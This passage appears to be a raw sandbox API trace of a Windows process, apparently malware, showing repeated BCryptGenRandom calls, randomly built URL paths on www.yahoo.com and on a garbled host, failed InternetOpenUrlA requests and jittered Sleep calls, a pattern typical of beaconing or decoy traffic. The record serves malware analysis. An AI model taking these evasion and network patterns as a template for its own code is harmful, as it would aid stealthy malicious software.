dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.427] GetProcessHeap () returned 0x440000 [0231.427] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0231.427] lstrcpyA (in: lpString1=0x473b90, lpString2="\x13ÅÓÐs://www.yahoo.com" | out: lpString1="\x13ÅÓÐs://www.yahoo.com") returned="\x13ÅÓÐs://www.yahoo.com" [0231.427] lstrcatA (in: lpString1="\x13ÅÓÐs://www.yahoo.com", lpString2="/ruyzy16k8wcF6i71xoepFfXS/ue63jzTYdkTuyb7dq0nGx1Svexiep9/" | out: lpString1="\x13ÅÓÐs://www.yahoo.com/ruyzy16k8wcF6i71xoepFfXS/ue63jzTYdkTuyb7dq0nGx1Svexiep9/") returned="\x13ÅÓÐs://www.yahoo.com/ruyzy16k8wcF6i71xoepFfXS/ue63jzTYdkTuyb7dq0nGx1Svexiep9/" [0231.427] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0231.427] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x13ÅÓÐs://www.yahoo.com/ruyzy16k8wcF6i71xoepFfXS/ue63jzTYdkTuyb7dq0nGx1Svexiep9/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0231.427] GetProcessHeap () returned 0x440000 [0231.427] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0231.427] GetProcessHeap () returned 0x440000 [0231.428] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b410 | out: hHeap=0x440000) returned 1 [0231.428] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0231.428] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0231.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0231.429] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0231.429] Sleep (dwMilliseconds=0x16540) [0231.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0231.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0231.983] GetProcessHeap () returned 0x440000 [0231.983] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5530 [0231.983] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0231.983] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5531, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x4f5531) returned 0x0 [0231.983] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.985] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.985] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.985] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.985] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0231.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0231.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0231.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0231.988] GetProcessHeap () returned 0x440000 [0231.988] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0231.988] lstrcpyA (in: lpString1=0x472900, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0231.988] lstrcatA (in: lpString1="\x81\x03", lpString2="/l0x0k6qdlf5eAhdzvrOyvPkdbz/" | out: lpString1="\x81\x03/l0x0k6qdlf5eAhdzvrOyvPkdbz/") returned="\x81\x03/l0x0k6qdlf5eAhdzvrOyvPkdbz/" [0231.988] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0231.988] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/l0x0k6qdlf5eAhdzvrOyvPkdbz/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0231.988] GetProcessHeap () returned 0x440000 [0231.988] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0231.988] GetProcessHeap () returned 0x440000 [0231.988] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5530 | out: hHeap=0x440000) returned 1 [0231.989] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0231.989] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0231.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0231.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0231.989] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0231.989] Sleep (dwMilliseconds=0x12d69) [0232.319] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0232.320] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0232.320] GetProcessHeap () returned 0x440000 [0232.320] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d64a0 [0232.320] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0232.320] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d64a1, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x4d64a1) returned 0x0 [0232.321] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.321] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.321] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.322] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.322] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.322] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.322] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.322] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.323] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0232.323] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.323] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.324] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.325] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0232.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d64be, cbBuffer=0x26, dwFlags=0x2 | out: pbBuffer=0x4d64be) returned 0x0 [0232.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.327] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.329] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.331] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0232.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0232.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0232.332] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 